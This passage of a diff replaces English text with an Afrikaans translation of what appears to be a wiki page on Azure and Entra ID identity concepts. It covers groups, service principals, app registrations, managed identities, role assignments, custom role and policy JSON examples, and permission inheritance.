+- **Gaste gebruikers het dieselfde toegang as lede** gee alle lid gebruiker toestemmings aan gaste gebruikers per standaard.
+- **Gaste gebruikers het beperkte toegang tot eienskappe en lidmaatskappe van gids objekte (standaard)** beperk gaste toegang tot slegs hul eie gebruikersprofiel per standaard. Toegang tot ander gebruikers en groep inligting is nie meer toegelaat nie.
+- **Gaste gebruiker toegang is beperk tot eienskappe en lidmaatskappe van hul eie gids objekte** is die mees beperkende een.
+- **Gaste kan nooi**
+- **Enige iemand in die organisasie kan gaste gebruikers nooi insluitend gaste en nie-admins (mees inklusief) - Standaard**
+- **Lid gebruikers en gebruikers wat aan spesifieke admin rolle toegeken is kan gaste gebruikers nooi insluitend gaste met lid toestemmings**
+- **Slegs gebruikers wat aan spesifieke admin rolle toegeken is kan gaste gebruikers nooi**
+- **Niemand in die organisasie kan gaste gebruikers nooi insluitend admins (mees beperkende)**
+- **Buitelandse gebruiker verlaat**: Standaard **Waar**
+- Laat buitelandse gebruikers toe om die organisasie te verlaat
 
 > [!TIP]
-> Even if restricted by default, users (members and guests) with granted permissions could perform the previous actions.
+> Alhoewel dit per standaard beperk is, kan gebruikers (lede en gaste) met toegekenne toestemmings die vorige aksies uitvoer.
 
-### **Groups**
+### **Groepe**
 
-There are **2 types of groups**:
+Daar is **2 tipes groepe**:
 
-- **Security**: This type of group is used to give members access to aplications, resources and assign licenses. Users, devices, service principals and other groups an be members.
-- **Microsoft 365**: This type of group is used for collaboration, giving members access to a shared mailbox, calendar, files, SharePoint site, and so on. Group members can only be users.
-  - This will have an **email address** with the domain of the EntraID tenant.
+- **Sekuriteit**: Hierdie tipe groep word gebruik om lede toegang te gee tot toepassings, hulpbronne en om lisensies toe te ken. Gebruikers, toestelle, diens prinsipale en ander groepe kan lede wees.
+- **Microsoft 365**: Hierdie tipe groep word gebruik vir samewerking, wat lede toegang gee tot 'n gedeelde posbus, kalender, lêers, SharePoint webwerf, ensovoorts. Groep lede kan slegs gebruikers wees.
+- Dit sal 'n **e-pos adres** hê met die domein van die EntraID huur.
 
-There are **2 types of memberships**:
+Daar is **2 tipes lidmaatskappe**:
 
-- **Assigned**: Allow to manually add specific members to a group.
-- **Dynamic membership**: Automatically manages membership using rules, updating group inclusion when members attributes change.
+- **Toegeken**: Laat toe om spesifieke lede handmatig aan 'n groep toe te voeg.
+- **Dinamiese lidmaatskap**: Bestuur lidmaatskap outomaties met behulp van reëls, wat die groep insluiting opdateer wanneer lede se eienskappe verander.
 
-### **Service Principals**
+### **Diens Prinsipale**
 
-A **Service Principal** is an **identity** created for **use** with **applications**, hosted services, and automated tools to access Azure resources. This access is **restricted by the roles assigned** to the service principal, giving you control over **which resources can be accessed** and at which level. For security reasons, it's always recommended to **use service principals with automated tools** rather than allowing them to log in with a user identity.
+'n **Diens Prinsipaal** is 'n **identiteit** geskep vir **gebruik** met **toepassings**, gehoste dienste, en geoutomatiseerde gereedskap om toegang tot Azure hulpbronne te verkry. Hierdie toegang is **beperk deur die rolle wat aan die diens prinsipaal toegeken is**, wat jou beheer gee oor **watter hulpbronne toegang verkry** en op watter vlak. Om veiligheidsredes, word dit altyd aanbeveel om **diens prinsipale met geoutomatiseerde gereedskap te gebruik** eerder as om hulle toe te laat om met 'n gebruikersidentiteit aan te meld.
 
-It's possible to **directly login as a service principal** by generating it a **secret** (password), a **certificate**, or granting **federated** access to third party platforms (e.g. Github Actions) over it.
+Dit is moontlik om **direk as 'n diens prinsipaal aan te meld** deur 'n **geheim** (wagwoord), 'n **sertifikaat**, of deur **federale** toegang aan derdeparty platforms (bv. Github Actions) oor dit te verleen.
 
-- If you choose **password** auth (by default), **save the password generated** as you won't be able to access it again.
-- If you choose certificate authentication, make sure the **application will have access over the private key**.
+- As jy **wagwoord** autentisering kies (per standaard), **stoor die gegenereerde wagwoord** aangesien jy dit nie weer kan toegang nie.
+- As jy sertifikaat autentisering kies, maak seker dat die **toepassing toegang sal hê oor die private sleutel**.
 
-### App Registrations
+### App Registrasies
 
-An **App Registration** is a configuration that allows an application to integrate with Entra ID and to perform actions.
+'n **App Registrasie** is 'n konfigurasie wat 'n toepassing toelaat om met Entra ID te integreer en aksies uit te voer.
 
-#### Key Components:
+#### Sleutel Komponente:
 
-1. **Application ID (Client ID):** A unique identifier for your app in Azure AD.
-2. **Redirect URIs:** URLs where Azure AD sends authentication responses.
-3. **Certificates, Secrets & Federated Credentials:** It's possible to generate a secret or a certificate to login as the service principal of the application, or to grant federated access to it (e.g. Github Actions).&#x20;
-   1. If a **certificate** or **secret** is generated, it's possible to a person to **login as the service principal** with CLI tools by knowing the **application ID**, the **secret** or **certificate** and the **tenant** (domain or ID).
-4. **API Permissions:** Specifies what resources or APIs the app can access.
-5. **Authentication Settings:** Defines the app's supported authentication flows (e.g., OAuth2, OpenID Connect).
-6. **Service Principal**: A service principal is created when an App is created (if it's done from the web console) or when it's installed in a new tenant.
-   1. The **service principal** will get all the requested permissions it was configured with.
+1. **Toepassing ID (Kliënt ID):** 'n Unieke identifiseerder vir jou app in Azure AD.
+2. **Herlei URIs:** URL's waar Azure AD autentisering antwoorde stuur.
+3. **Sertifikate, Geheimen & Federale Kredite:** Dit is moontlik om 'n geheim of 'n sertifikaat te genereer om as die diens prinsipaal van die toepassing aan te meld, of om federale toegang aan dit te verleen (bv. Github Actions).&#x20;
+1. As 'n **sertifikaat** of **geheim** gegenereer word, is dit moontlik vir 'n persoon om **as die diens prinsipaal** met CLI gereedskap aan te meld deur die **toepassing ID**, die **geheim** of **sertifikaat** en die **huur** (domein of ID) te ken.
+4. **API Toestemmings:** Spesifiseer watter hulpbronne of API's die app kan toegang.
+5. **Autentisering Instellings:** Definieer die app se ondersteunde autentisering vloei (bv., OAuth2, OpenID Connect).
+6. **Diens Prinsipaal**: 'n diens prinsipaal word geskep wanneer 'n App geskep word (as dit vanaf die webkonsol gedoen word) of wanneer dit in 'n nuwe huur geïnstalleer word.
+1. Die **diens prinsipaal** sal al die gevraagde toestemmings wat dit geconfigureer is, ontvang.
 
-### Default Consent Permissions
+### Standaard Toestemming Toestemmings
 
-**User consent for applications**
+**Gebruiker toestemming vir toepassings**
 
-- **Do not allow user consent**
-  - An administrator will be required for all apps.
-- **Allow user consent for apps from verified publishers, for selected permissions (Recommended)**
-  - All users can consent for permissions classified as "low impact", for apps from verified publishers or apps registered in this organization.
-  - **Default** low impact permissions (although you need to accept to add them as low):
-    - User.Read - sign in and read user profile
-    - offline_access - maintain access to data that users have given it access to
-    - openid - sign users in
-    - profile - view user's basic profile
-    - email - view user's email address
-- **Allow user consent for apps (Default)**
-  - All users can consent for any app to access the organization's data.
+- **Moet nie gebruiker toestemming toelaat nie**
+- 'n Administrateur sal vir alle apps benodig word.
+- **Laat gebruiker toestemming toe vir apps van geverifieerde uitgewers, vir geselekteerde toestemmings (Aanbeveel)**
+- Alle gebruikers kan toestemming gee vir toestemmings wat as "lae impak" geklassifiseer is, vir apps van geverifieerde uitgewers of apps wat in hierdie organisasie geregistreer is.
+- **Standaard** lae impak toestemmings (alhoewel jy moet aanvaar om hulle as laag by te voeg):
+- User.Read - teken in en lees gebruikersprofiel
+- offline_access - hou toegang tot data wat gebruikers toegang gegee het
+- openid - teken gebruikers in
+- profile - sien gebruiker se basiese profiel
+- email - sien gebruiker se e-pos adres
+- **Laat gebruiker toestemming toe vir apps (Standaard)**
+- Alle gebruikers kan toestemming gee vir enige app om toegang tot die organisasie se data te verkry.
 
-**Admin consent requests**: Default **No**
+**Admin toestemming versoeke**: Standaard **Nee**
 
-- Users can request admin consent to apps they are unable to consent to
-- If **Yes**: It’s possible to indicate Users, Groups and Roles that can consent requests
-  - Configure also if users will receive email notifications and expiration reminders&#x20;
+- Gebruikers kan admin toestemming versoek vir apps waartoe hulle nie toestemming kan gee nie
+- As **Ja**: Dit is moontlik om Gebruikers, Groepe en Rolle aan te dui wat toestemming versoeke kan gee
+- Konfigureer ook of gebruikers e-pos kennisgewings en vervaldatums herinneringe sal ontvang&#x20;
 
-### **Managed Identity (Metadata)**
+### **Bestuurde Identiteit (Metadata)**
 
-Managed identities in Azure Active Directory offer a solution for **automatically managing the identity** of applications. These identities are used by applications for the purpose of **connecting** to **resources** compatible with Azure Active Directory (**Azure AD**) authentication. This allows to **remove the need of hardcoding cloud credentials** in the code as the application will be able to contact the **metadata** service to get a valid token to **perform actions** as the indicated managed identity in Azure.
+Bestuurde identiteite in Azure Aktiewe Gids bied 'n oplossing vir **outomatiese bestuur van die identiteit** van toepassings. Hierdie identiteite word deur toepassings gebruik om te **verbinde** met **hulpbronne** wat versoenbaar is met Azure Aktiewe Gids (**Azure AD**) autentisering. Dit maak dit moontlik om **die behoefte aan hardkoding van wolk akrediteer** in die kode te verwyder aangesien die toepassing in staat sal wees om die **metadata** diens te kontak om 'n geldige token te **verrig** as die aangeduide bestuurde identiteit in Azure.
 
-There are two types of managed identities:
+Daar is twee tipes bestuurde identiteite:
 
-- **System-assigned**. Some Azure services allow you to **enable a managed identity directly on a service instance**. When you enable a system-assigned managed identity, a **service principal** is created in the Entra ID tenant trusted by the subscription where the resource is located. When the **resource** is **deleted**, Azure automatically **deletes** the **identity** for you.
-- **User-assigned**. It's also possible for users to generate managed identities. These are created inside a resource group inside a subscription and a service principal will be created in the EntraID trusted by the subscription. Then, you can assign the managed identity to one or **more instances** of an Azure service (multiple resources). For user-assigned managed identities, the **identity is managed separately from the resources that use it**.
+- **Stelsel-toegeken**. Sommige Azure dienste laat jou toe om 'n **bestuurde identiteit direk op 'n diens instansie** in te skakel. Wanneer jy 'n stelsel-toegeken bestuurde identiteit inskakel, word 'n **diens prinsipaal** geskep in die Entra ID huur wat deur die subskripsie vertrou word waar die hulpbron geleë is. Wanneer die **hulpbron** verwyder word, verwyder Azure outomaties die **identiteit** vir jou.
+- **Gebruiker-toegeken**. Dit is ook moontlik vir gebruikers om bestuurde identiteite te genereer. Hierdie word binne 'n hulpbron groep binne 'n subskripsie geskep en 'n diens prinsipaal sal in die EntraID geskep word wat deur die subskripsie vertrou word. Dan kan jy die bestuurde identiteit aan een of **meer instansies** van 'n Azure diens toeken. Vir gebruiker-toegeken bestuurde identiteite, word die **identiteit apart bestuur van die hulpbronne wat dit gebruik**.
 
-Managed Identities **don't generate eternal credentials** (like passwords or certificates) to access as the service principal attached to it.
+Bestuurde Identiteite **genereer nie ewige akrediteer** (soos wagwoorde of sertifikate) om toegang te verkry as die diens prinsipaal wat aan dit geheg is.
 
-### Enterprise Applications
+### Enterprise Toepassings
 
-It’s just a **table in Azure to filter service principals** and check the applications that have been assigned to.
+Dit is net 'n **tafel in Azure om diens prinsipale te filter** en die toepassings wat aan hulle toegeken is, te kontroleer.
 
-**It isn’t another type of “application”,** there isn’t any object in Azure that is an “Enterprise Application”, it’s just an abstraction to check the Service principals, App registrations and managed identities.
+**Dit is nie 'n ander tipe "toepassing" nie,** daar is geen objek in Azure wat 'n "Enterprise Toepassing" is nie, dit is net 'n abstraksie om die Diens prinsipale, App registrasies en bestuurde identiteite te kontroleer.
 
-### Administrative Units
+### Administratiewe Eenhede
 
-Administrative units allows to **give permissions from a role over a specific portion of an organization**.
+Administratiewe eenhede laat toe om **toestemmings van 'n rol oor 'n spesifieke gedeelte van 'n organisasie te gee**.
 
-Example:
+Voorbeeld:
 
-- Scenario: A company wants regional IT admins to manage only the users in their own region.
-- Implementation:
-  - Create Administrative Units for each region (e.g., "North America AU", "Europe AU").
-    - Populate AUs with users from their respective regions.
-      - AUs can **contain users, groups, or devices**
-      - AUs support **dynamic memberships**
-      - AUs **cannot contain AUs**
-    - Assign Admin Roles:
-      - Grant the "User Administrator" role to regional IT staff, scoped to their region's AU.
-- Outcome: Regional IT admins can manage user accounts within their region without affecting other regions.
+- Scenario: 'n Maatskappy wil regionale IT admins toelaat om slegs die gebruikers in hul eie streek te bestuur.
+- Implementering:
+- Skep Administratiewe Eenhede vir elke streek (bv., "Noord-Amerika AU", "Europa AU").
+- Vul AU's met gebruikers uit hul onderskeie streke.
+- AU's kan **gebruikers, groepe, of toestelle** bevat
+- AU's ondersteun **dinamiese lidmaatskappe**
+- AU's **kan nie AU's bevat nie**
+- Ken Admin Rolle toe:
+- Gee die "Gebruiker Administrateur" rol aan regionale IT personeel, geskaal na hul streek se AU.
+- Uitkoms: Regionale IT admins kan gebruikersrekeninge binne hul streek bestuur sonder om ander streke te beïnvloed.
 
-### Entra ID Roles
+### Entra ID Rolle
 
-- In order to manage Entra ID there are some **built-in roles** that can be assigned to Entra ID principals to manage Entra ID
-  - Check the roles in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
-- The most privileged role is **Global Administrator**
-- In the Description of the role it’s possible to see its **granular permissions**
+- Ten einde Entra ID te bestuur, is daar 'n paar **ingeboude rolle** wat aan Entra ID prinsipale toegeken kan word om Entra ID te bestuur
+- Kyk na die rolle in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
+- Die mees bevoorregte rol is **Globale Administrateur**
+- In die Beskrywing van die rol is dit moontlik om sy **fynere toestemmings** te sien
 
-## Roles & Permissions
+## Rolle & Toestemmings
 
-**Roles** are **assigned** to **principals** on a **scope**: `principal -[HAS ROLE]->(scope)`
+**Rolle** word **toegeken** aan **prinsipale** op 'n **skaal**: `prinsipaal -[HEE ROLE]->(skaal)`
 
-**Roles** assigned to **groups** are **inherited** by all the **members** of the group.
+**Rolle** wat aan **groepe** toegeken word, word **geërf** deur al die **lede** van die groep.
 
-Depending on the scope the role was assigned to, the **role** cold be **inherited** to **other resources** inside the scope container. For example, if a user A has a **role on the subscription**, he will have that **role on all the resource groups** inside the subscription and on **all the resources** inside the resource group.
+Afhangende van die skaal waaraan die rol toegeken is, kan die **rol** **geërf** word na **ander hulpbronne** binne die skaal houer. Byvoorbeeld, as 'n gebruiker A 'n **rol op die subskripsie** het, sal hy daardie **rol op al die hulpbron groepe** binne die subskripsie hê en op **al die hulpbronne** binne die hulpbron groep.
 
-### **Classic Roles**
+### **Klassieke Rolle**
 
-| **Owner**                     | <ul><li>Full access to all resources</li><li>Can manage access for other users</li></ul> | All resource types |
-| ----------------------------- | ---------------------------------------------------------------------------------------- | ------------------ |
-| **Contributor**               | <ul><li>Full access to all resources</li><li>Cannot manage access</li></ul>              | All resource types |
-| **Reader**                    | • View all resources                                                                     | All resource types |
-| **User Access Administrator** | <ul><li>View all resources</li><li>Can manage access for other users</li></ul>           | All resource types |
+| **Eienaar**                     | <ul><li>Volledige toegang tot alle hulpbronne</li><li>Kan toegang vir ander gebruikers bestuur</li></ul> | Alle hulpbron tipes |
+| ------------------------------- | ---------------------------------------------------------------------------------------- | ------------------ |
+| **Bydraer**                     | <ul><li>Volledige toegang tot alle hulpbronne</li><li>Kan nie toegang bestuur nie</li></ul>              | Alle hulpbron tipes |
+| **Leser**                       | • Sien alle hulpbronne                                                                     | Alle hulpbron tipes |
+| **Gebruiker Toegang Administrateur** | <ul><li>Sien alle hulpbronne</li><li>Kan toegang vir ander gebruikers bestuur</li></ul>           | Alle hulpbron tipes |
 
-### Built-In roles
+### Gebou-in rolle
 
-[From the docs: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure role-based access control (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) has several Azure **built-in roles** that you can **assign** to **users, groups, service principals, and managed identities**. Role assignments are the way you control **access to Azure resources**. If the built-in roles don't meet the specific needs of your organization, you can create your own [**Azure custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.**
+[Van die dokumentasie: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure rol-gebaseerde toegangbeheer (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) het verskeie Azure **gebou-in rolle** wat jy kan **toeken** aan **gebruikers, groepe, diens prinsipale, en bestuurde identiteite**. Rol toekennings is die manier waarop jy **toegang tot Azure hulpbronne** beheer. As die gebou-in rolle nie aan die spesifieke behoeftes van jou organisasie voldoen nie, kan jy jou eie [**Azure pasgemaakte rolle**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.**
 
-**Built-In** roles apply only to the **resources** they are **meant** to, for example check this 2 examples of **Built-In roles over Compute** resources:
+**Gebou-in** rolle geld slegs vir die **hulpbronne** waarvoor hulle **bedoel** is, byvoorbeeld kyk na hierdie 2 voorbeelde van **Gebou-in rolle oor Compute** hulpbronne:
 
-| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader)                 | Provides permission to backup vault to perform disk backup.      | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 |
+| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader)                 | Bied toestemming aan om rugsteun kluise te gebruik om disk rugsteun te doen.      | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 |
 | ----------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------- | ------------------------------------ |
-| [Virtual Machine User Login](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | View Virtual Machines in the portal and login as a regular user. | fb879df8-f326-4884-b1cf-06f3ad86be52 |
+| [Virtuele Masjien Gebruiker Aanmelding](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | Sien Virtuele Masjiene in die portaal en meld aan as 'n gewone gebruiker. | fb879df8-f326-4884-b1cf-06f3ad86be52 |
 
-This roles can **also be assigned over logic containers** (such as management groups, subscriptions and resource groups) and the principals affected will have them **over the resources inside those containers**.
+Hierdie rolle kan **ook toegeken word oor logiese houers** (soos bestuursgroepe, subskripsies en hulpbron groepe) en die prinsipale wat geraak word, sal dit **oor die hulpbronne binne daardie houers** hê.
 
-- Find here a list with [**all the Azure built-in roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles).
-- Find here a list with [**all the Entra ID built-in roles**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference).
+- Vind hier 'n lys met [**alle Azure gebou-in rolle**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles).
+- Vind hier 'n lys met [**alle Entra ID gebou-in rolle**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference).
 
-### Custom Roles
+### Pasgemaakte Rolle
 
-- It’s also possible to create [**custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)
-- They are created inside a scope, although a role can be in several scopes (management groups, subscription and resource groups)
-- It’s possible to configure all the granular permissions the custom role will have
-- It’s possible to exclude permissions
-  - A principal with a excluded permission won’t be able to use it even if the permissions is being granted elsewhere
-- It’s possible to use wildcards
-- The used format is a JSON
-  - `actions` are for control actions over the resource
-  - `dataActions` are permissions over the data within the object
-
-Example of permissions JSON for a custom role:
+- Dit is ook moontlik om [**pasgemaakte rolle**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles) te skep
+- Hulle word binne 'n skaal geskep, alhoewel 'n rol in verskeie skale kan wees (bestuursgroepe, subskripsie en hulpbron groepe)
+- Dit is moontlik om al die fynere toestemmings wat die pasgemaakte rol sal hê, te konfigureer
+- Dit is moontlik om toestemmings uit te sluit
+- 'n prinsipaal met 'n uitgeslote toestemming sal dit nie kan gebruik nie, selfs al word die toestemming elders toegeken
+- Dit is moontlik om wildcard te gebruik
+- Die gebruikte formaat is 'n JSON
+- `actions` is vir beheer aksies oor die hulpbron
+- `dataActions` is toestemmings oor die data binne die objek
 
+Voorbeeld van toestemmings JSON vir 'n pasgemaakte rol:
 ```json
 {
-  "properties": {
-    "roleName": "",
-    "description": "",
-    "assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"],
-    "permissions": [
-      {
-        "actions": [
-          "Microsoft.DigitalTwins/register/action",
-          "Microsoft.DigitalTwins/unregister/action",
-          "Microsoft.DigitalTwins/operations/read",
-          "Microsoft.DigitalTwins/digitalTwinsInstances/read",
-          "Microsoft.DigitalTwins/digitalTwinsInstances/write",
-          "Microsoft.CostManagement/exports/*"
-        ],
-        "notActions": [
-          "Astronomer.Astro/register/action",
-          "Astronomer.Astro/unregister/action",
-          "Astronomer.Astro/operations/read",
-          "Astronomer.Astro/organizations/read"
-        ],
-        "dataActions": [],
-        "notDataActions": []
-      }
-    ]
-  }
+"properties": {
+"roleName": "",
+"description": "",
+"assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"],
+"permissions": [
+{
+"actions": [
+"Microsoft.DigitalTwins/register/action",
+"Microsoft.DigitalTwins/unregister/action",
+"Microsoft.DigitalTwins/operations/read",
+"Microsoft.DigitalTwins/digitalTwinsInstances/read",
+"Microsoft.DigitalTwins/digitalTwinsInstances/write",
+"Microsoft.CostManagement/exports/*"
+],
+"notActions": [
+"Astronomer.Astro/register/action",
+"Astronomer.Astro/unregister/action",
+"Astronomer.Astro/operations/read",
+"Astronomer.Astro/organizations/read"
+],
+"dataActions": [],
+"notDataActions": []
+}
+]
+}
 }
 ```
+### Permissies volgorde
 
-### Permissions order
-
-- In order for a **principal to have some access over a resource** he needs an explicit role being granted to him (anyhow) **granting him that permission**.
-- An explicit **deny role assignment takes precedence** over the role granting the permission.
+- Ten einde vir 'n **hoofpersoon om toegang tot 'n hulpbron te hê** moet daar 'n eksplisiete rol aan hom toegeken word (op enige manier) **wat hom daardie toestemming gee**.
+- 'n Eksplisiete **weier roltoewysing het voorrang** bo die rol wat die toestemming gee.
 
 <figure><img src="../../../images/image (191).png" alt=""><figcaption><p><a href="https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10">https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10</a></p></figcaption></figure>
 
-### Global Administrator
+### Globale Administrateur
 
-Global Administrator is a role from Entra ID that grants **complete control over the Entra ID tenant**. However, it doesn't grant any permissions over Azure resources by default.
+Globale Administrateur is 'n rol van Entra ID wat **volledige beheer oor die Entra ID huurder gee**. Dit gee egter nie standaard enige toestemmings oor Azure hulpbronne nie.
 
-Users with the Global Administrator role has the ability to '**elevate' to User Access Administrator Azure role in the Root Management Group**. So Global Administrators can manage access in **all Azure subscriptions and management groups.**\
-This elevation can be done at the end of the page: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
+Gebruikers met die Globale Administrateur rol het die vermoë om '**te verhoog' na die Gebruikerstoegang Administrateur Azure rol in die Wortelbestuursgroep**. So kan Globale Administrateurs toegang in **alle Azure subskripsies en bestuursgroepe bestuur.**\
+Hierdie verhoging kan aan die einde van die bladsy gedoen word: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
 
 <figure><img src="../../../images/image (349).png" alt=""><figcaption></figcaption></figure>
 
-### Azure Policies
+### Azure Beleide
 
-**Azure Policies** are rules that help organizations ensure their resources meet specific standards and compliance requirements. They allow you to **enforce or audit settings on resources in Azure**. For example, you can prevent the creation of virtual machines in an unauthorized region or ensure that all resources have specific tags for tracking.
+**Azure Beleide** is reëls wat organisasies help om te verseker dat hul hulpbronne aan spesifieke standaarde en nakomingsvereistes voldoen. Hulle stel jou in staat om **instellings op hulpbronne in Azure af te dwing of te oudit**. Byvoorbeeld, jy kan die skepping van virtuele masjiene in 'n nie-geautoriseerde streek voorkom of verseker dat alle hulpbronne spesifieke etikette het vir opsporing.
 
-Azure Policies are **proactive**: they can stop non-compliant resources from being created or changed. They are also **reactive**, allowing you to find and fix existing non-compliant resources.
+Azure Beleide is **proaktief**: hulle kan nie-nakomende hulpbronne stop om geskep of verander te word. Hulle is ook **reaktief**, wat jou toelaat om bestaande nie-nakomende hulpbronne te vind en reg te stel.
 
-#### **Key Concepts**
+#### **Belangrike Konsepte**
 
-1. **Policy Definition**: A rule, written in JSON, that specifies what is allowed or required.
-2. **Policy Assignment**: The application of a policy to a specific scope (e.g., subscription, resource group).
-3. **Initiatives**: A collection of policies grouped together for broader enforcement.
-4. **Effect**: Specifies what happens when the policy is triggered (e.g., "Deny," "Audit," or "Append").
+1. **Beleid Definisie**: 'n Reël, geskryf in JSON, wat spesifiseer wat toegelaat of vereis word.
+2. **Beleid Toewysing**: Die toepassing van 'n beleid op 'n spesifieke omvang (bv. subskripsie, hulpbron groep).
+3. **Inisiatiewe**: 'n Versameling van beleide wat saamgegroepeer is vir breër afdwinging.
+4. **Effek**: Spesifiseer wat gebeur wanneer die beleid geaktiveer word (bv. "Weier," "Oudit," of "Voeg by").
 
-**Some examples:**
+**Sommige voorbeelde:**
 
-1. **Ensuring Compliance with Specific Azure Regions**: This policy ensures that all resources are deployed in specific Azure regions. For example, a company might want to ensure all its data is stored in Europe for GDPR compliance.
-2. **Enforcing Naming Standards**: Policies can enforce naming conventions for Azure resources. This helps in organizing and easily identifying resources based on their names, which is helpful in large environments.
-3. **Restricting Certain Resource Types**: This policy can restrict the creation of certain types of resources. For example, a policy could be set to prevent the creation of expensive resource types, like certain VM sizes, to control costs.
-4. **Enforcing Tagging Policies**: Tags are key-value pairs associated with Azure resources used for resource management. Policies can enforce that certain tags must be present, or have specific values, for all resources. This is useful for cost tracking, ownership, or categorization of resources.
-5. **Limiting Public Access to Resources**: Policies can enforce that certain resources, like storage accounts or databases, do not have public endpoints, ensuring that they are only accessible within the organization's network.
-6. **Automatically Applying Security Settings**: Policies can be used to automatically apply security settings to resources, such as applying a specific network security group to all VMs or ensuring that all storage accounts use encryption.
+1. **Verseker Nakoming met Spesifieke Azure Streke**: Hierdie beleid verseker dat alle hulpbronne in spesifieke Azure streke ontplooi word. Byvoorbeeld, 'n maatskappy mag wil verseker dat al sy data in Europa gestoor word vir GDPR-nakoming.
+2. **Afgedwonge Naamstandaarde**: Beleide kan naamkonvensies vir Azure hulpbronne afdwing. Dit help om hulpbronne te organiseer en maklik te identifiseer op grond van hul name, wat nuttig is in groot omgewings.
+3. **Beperking van Sekere Hulpbron Tipes**: Hierdie beleid kan die skepping van sekere tipes hulpbronne beperk. Byvoorbeeld, 'n beleid kan ingestel word om die skepping van duur hulpbron tipes, soos sekere VM-groottes, te voorkom om koste te beheer.
+4. **Afgedwonge Etikettering Beleide**: Etikette is sleutel-waarde pare wat met Azure hulpbronne geassosieer word en gebruik word vir hulpbronbestuur. Beleide kan afdwing dat sekere etikette teenwoordig moet wees, of spesifieke waardes moet hê, vir alle hulpbronne. Dit is nuttig vir kostesporing, eienaarskap, of kategorisering van hulpbronne.
+5. **Beperking van Publieke Toegang tot Hulpbronne**: Beleide kan afdwing dat sekere hulpbronne, soos stoor rekeninge of databasisse, nie publieke eindpunte het nie, wat verseker dat hulle slegs binne die organisasie se netwerk toeganklik is.
+6. **Outomatiese Toepassing van Sekuriteitsinstellings**: Beleide kan gebruik word om outomaties sekuriteitsinstellings op hulpbronne toe te pas, soos om 'n spesifieke netwerk sekuriteitsgroep op alle VM's toe te pas of te verseker dat alle stoor rekeninge versleuteling gebruik.
 
-Note that Azure Policies can be attached to any level of the Azure hierarchy, but they are **commonly used in the root management group** or in other management groups.
-
-Azure policy json example:
+Let daarop dat Azure Beleide aan enige vlak van die Azure hiërargie geheg kan word, maar hulle word **gewoonlik in die wortelbestuursgroep** of in ander bestuursgroepe gebruik.
 
+Azure beleid json voorbeeld:
 ```json
 {
-  "policyRule": {
-    "if": {
-      "field": "location",
-      "notIn": ["eastus", "westus"]
-    },
-    "then": {
-      "effect": "Deny"
-    }
-  },
-  "parameters": {},
-  "displayName": "Allow resources only in East US and West US",
-  "description": "This policy ensures that resources can only be created in East US or West US.",
-  "mode": "All"
+"policyRule": {
+"if": {
+"field": "location",
+"notIn": ["eastus", "westus"]
+},
+"then": {
+"effect": "Deny"
+}
+},
+"parameters": {},
+"displayName": "Allow resources only in East US and West US",
+"description": "This policy ensures that resources can only be created in East US or West US.",
+"mode": "All"
 }
 ```
+### Toestemmings Erf
 
-### Permissions Inheritance
+In Azure **kan toestemmings aan enige deel van die hiërargie toegeken word**. Dit sluit bestuursgroepe, subskripsies, hulpbron groepe, en individuele hulpbronne in. Toestemmings word **geërf** deur die ingeslote **hulpbronne** van die entiteit waar hulle toegeken is.
 
-In Azure **permissions are can be assigned to any part of the hierarchy**. That includes management groups, subscriptions, resource groups, and individual resources. Permissions are **inherited** by contained **resources** of the entity where they were assigned.
-
-This hierarchical structure allows for efficient and scalable management of access permissions.
+Hierdie hiërargiese struktuur stel doeltreffende en skaalbare bestuur van toegangstoestemmings in staat.
 
 <figure><img src="../../../images/image (26).png" alt=""><figcaption></figcaption></figure>
 
 ### Azure RBAC vs ABAC
 
-**RBAC** (role-based access control) is what we have seen already in the previous sections: **Assigning a role to a principal to grant him access** over a resource.\
-However, in some cases you might want to provide **more fined-grained access management** or **simplify** the management of **hundreds** of role **assignments**.
+**RBAC** (rol-gebaseerde toegangbeheer) is wat ons reeds in die vorige afdelings gesien het: **'n rol aan 'n prinsiep toe te ken om hom toegang te gee** oor 'n hulpbron.\
+E however, in sommige gevalle wil jy dalk **meer fyn-gegradeerde toegangsbewaking** of **vereenvoudig** die bestuur van **honderde** rol **toekennings**.
 
